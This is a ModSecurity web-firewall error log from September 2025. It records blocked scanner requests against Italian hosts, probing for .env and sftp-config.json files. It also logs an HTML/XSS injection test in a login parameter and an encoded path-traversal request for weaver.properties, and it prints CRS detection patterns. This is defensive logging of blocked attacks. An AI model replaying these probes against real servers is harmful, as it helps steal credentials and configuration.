[Thu Sep 04 22:37:10.467871 2025] [:error] [pid 2466856] [client 194.233.80.217:60019] [client 194.233.80.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aLn4dtTeTYwjEZ6-0lefiQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/sftp-config.json
[Thu Sep 04 22:37:11.502863 2025] [:error] [pid 2466860] [client 194.233.80.217:60494] [client 194.233.80.217] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aLn4d7lrAm1iN_0Y1dqRKwAAAAQ"]
[Thu Sep 04 22:37:11.503071 2025] [:error] [pid 2466860] [client 194.233.80.217:60494] [client 194.233.80.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aLn4d7lrAm1iN_0Y1dqRKwAAAAQ"]
[Thu Sep 04 22:37:11.503234 2025] [:error] [pid 2466860] [client 194.233.80.217:60494] [client 194.233.80.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aLn4d7lrAm1iN_0Y1dqRKwAAAAQ"]
[Thu Sep 04 22:37:11.575236 2025] [:error] [pid 2466858] [client 194.233.80.217:60495] [client 194.233.80.217] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /prevlaravel/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aLn4d8hHBJc5a4FCDeWyrQAAAAI"]
[Thu Sep 04 22:37:11.575448 2025] [:error] [pid 2466858] [client 194.233.80.217:60495] [client 194.233.80.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aLn4d8hHBJc5a4FCDeWyrQAAAAI"]
[Thu Sep 04 22:37:11.575600 2025] [:error] [pid 2466858] [client 194.233.80.217:60495] [client 194.233.80.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/prevlaravel/sftp-config.json"] [unique_id "aLn4d8hHBJc5a4FCDeWyrQAAAAI"]
[Sat Sep 06 12:11:06.945288 2025] [:error] [pid 2516674] [client 93.123.109.214:35876] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLwIupuQgqswfhi5vNCSxwAAAAE"]
[Sat Sep 06 12:11:06.946412 2025] [:error] [pid 2516674] [client 93.123.109.214:35876] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLwIupuQgqswfhi5vNCSxwAAAAE"]
[Sat Sep 06 12:11:06.946587 2025] [:error] [pid 2516674] [client 93.123.109.214:35876] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aLwIupuQgqswfhi5vNCSxwAAAAE"]
[Sat Sep 06 12:11:07.165587 2025] [:error] [pid 2516677] [client 93.123.109.214:35890] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aLwIu3jDB_3dhCWZ-XFBNAAAAAQ"]
[Sat Sep 06 12:11:07.165831 2025] [:error] [pid 2516677] [client 93.123.109.214:35890] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aLwIu3jDB_3dhCWZ-XFBNAAAAAQ"]
[Sat Sep 06 12:11:07.165988 2025] [:error] [pid 2516677] [client 93.123.109.214:35890] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aLwIu3jDB_3dhCWZ-XFBNAAAAAQ"]
[Sat Sep 06 12:11:07.422168 2025] [:error] [pid 2516673] [client 93.123.109.214:35904] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aLwIu8Yn8eNvFaPWcnHLOQAAAAA"]
[Sat Sep 06 12:11:07.422430 2025] [:error] [pid 2516673] [client 93.123.109.214:35904] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aLwIu8Yn8eNvFaPWcnHLOQAAAAA"]
[Sat Sep 06 12:11:07.422609 2025] [:error] [pid 2516673] [client 93.123.109.214:35904] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aLwIu8Yn8eNvFaPWcnHLOQAAAAA"]
[Sat Sep 06 12:11:07.629905 2025] [:error] [pid 2517003] [client 93.123.109.214:35908] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aLwIu593KbIGAT4u7ElyEwAAAAY"]
[Sat Sep 06 12:11:07.630176 2025] [:error] [pid 2517003] [client 93.123.109.214:35908] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aLwIu593KbIGAT4u7ElyEwAAAAY"]
[Sat Sep 06 12:11:07.630512 2025] [:error] [pid 2517003] [client 93.123.109.214:35908] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aLwIu593KbIGAT4u7ElyEwAAAAY"]
[Sat Sep 06 12:11:07.821575 2025] [authz_core:error] [pid 2516676] [client 93.123.109.214:35916] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sat Sep 06 12:11:08.015222 2025] [:error] [pid 2516699] [client 93.123.109.214:35932] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aLwIvMWE06U_wvqXl4saaQAAAAU"]
[Sat Sep 06 12:11:08.015466 2025] [:error] [pid 2516699] [client 93.123.109.214:35932] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aLwIvMWE06U_wvqXl4saaQAAAAU"]
[Sat Sep 06 12:11:08.015627 2025] [:error] [pid 2516699] [client 93.123.109.214:35932] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aLwIvMWE06U_wvqXl4saaQAAAAU"]
[Sat Sep 06 12:11:09.203643 2025] [:error] [pid 2516673] [client 93.123.109.214:35970] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aLwIvcYn8eNvFaPWcnHLOgAAAAA"]
[Sat Sep 06 12:11:09.203884 2025] [:error] [pid 2516673] [client 93.123.109.214:35970] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aLwIvcYn8eNvFaPWcnHLOgAAAAA"]
[Sat Sep 06 12:11:09.204045 2025] [:error] [pid 2516673] [client 93.123.109.214:35970] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aLwIvcYn8eNvFaPWcnHLOgAAAAA"]
[Sat Sep 06 12:11:09.335586 2025] [:error] [pid 2517003] [client 93.123.109.214:35974] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aLwIvZ93KbIGAT4u7ElyFAAAAAY"]
[Sat Sep 06 12:11:09.335827 2025] [:error] [pid 2517003] [client 93.123.109.214:35974] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aLwIvZ93KbIGAT4u7ElyFAAAAAY"]
[Sat Sep 06 12:11:09.335995 2025] [:error] [pid 2517003] [client 93.123.109.214:35974] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aLwIvZ93KbIGAT4u7ElyFAAAAAY"]
[Sat Sep 06 12:11:09.476547 2025] [:error] [pid 2516676] [client 93.123.109.214:35986] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aLwIvcnCDITQKpuginLtYQAAAAM"]
[Sat Sep 06 12:11:09.476813 2025] [:error] [pid 2516676] [client 93.123.109.214:35986] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aLwIvcnCDITQKpuginLtYQAAAAM"]
[Sat Sep 06 12:11:09.476973 2025] [:error] [pid 2516676] [client 93.123.109.214:35986] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aLwIvcnCDITQKpuginLtYQAAAAM"]
[Sun Sep 07 15:05:16.943617 2025] [:error] [pid 2552558] [client 185.165.171.225:27742] [client 185.165.171.225] ModSecurity: Warning. detected XSS using libinjection. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "59"] [id "941100"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: XSS data found within ARGS:jvar_page_title: <style><foo>Injected Title</foo></style>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/login.do"] [unique_id "aL2DDEFu5ZsGRj6Cs1t27AAAAAw"]
[Sun Sep 07 15:05:16.946294 2025] [:error] [pid 2552558] [client 185.165.171.225:27742] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:jvar_page_title. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "179"] [id "941140"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <style> found within ARGS:jvar_page_title: <style><foo>Injected Title</foo></style>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/login.do"] [unique_id "aL2DDEFu5ZsGRj6Cs1t27AAAAAw"]
[Sun Sep 07 15:05:16.946398 2025] [:error] [pid 2552558] [client 185.165.171.225:27742] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i:(?:<\\\\w[\\\\s\\\\S]*[\\\\s\\\\/]|['\\"](?:[\\\\s\\\\S]*[\\\\s\\\\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange ..." at ARGS:jvar_page_title. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "218"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <style found within ARGS:jvar_page_title: <style><foo>Injected Title</foo></style>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "economiasolidale.38121.it"] [uri "/login.do"] [unique_id "aL2DDEFu5ZsGRj6Cs1t27AAAAAw"]
[Sun Sep 07 15:05:16.946702 2025] [:error] [pid 2552558] [client 185.165.171.225:27742] [client 185.165.171.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login.do"] [unique_id "aL2DDEFu5ZsGRj6Cs1t27AAAAAw"]
[Sun Sep 07 15:05:16.946875 2025] [:error] [pid 2552558] [client 185.165.171.225:27742] [client 185.165.171.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login.do"] [unique_id "aL2DDEFu5ZsGRj6Cs1t27AAAAAw"]
[Sun Sep 07 15:05:17.071205 2025] [:error] [pid 2541667] [client 185.165.171.225:27824] [client 185.165.171.225] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2f%2e%2e%2f found within REQUEST_URI_RAW: /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/api/portalTsLogin/utils/getE9DevelopAllNameValue2"] [unique_id "aL2DDadcY-VinDEbW8JokAAAAAE"]
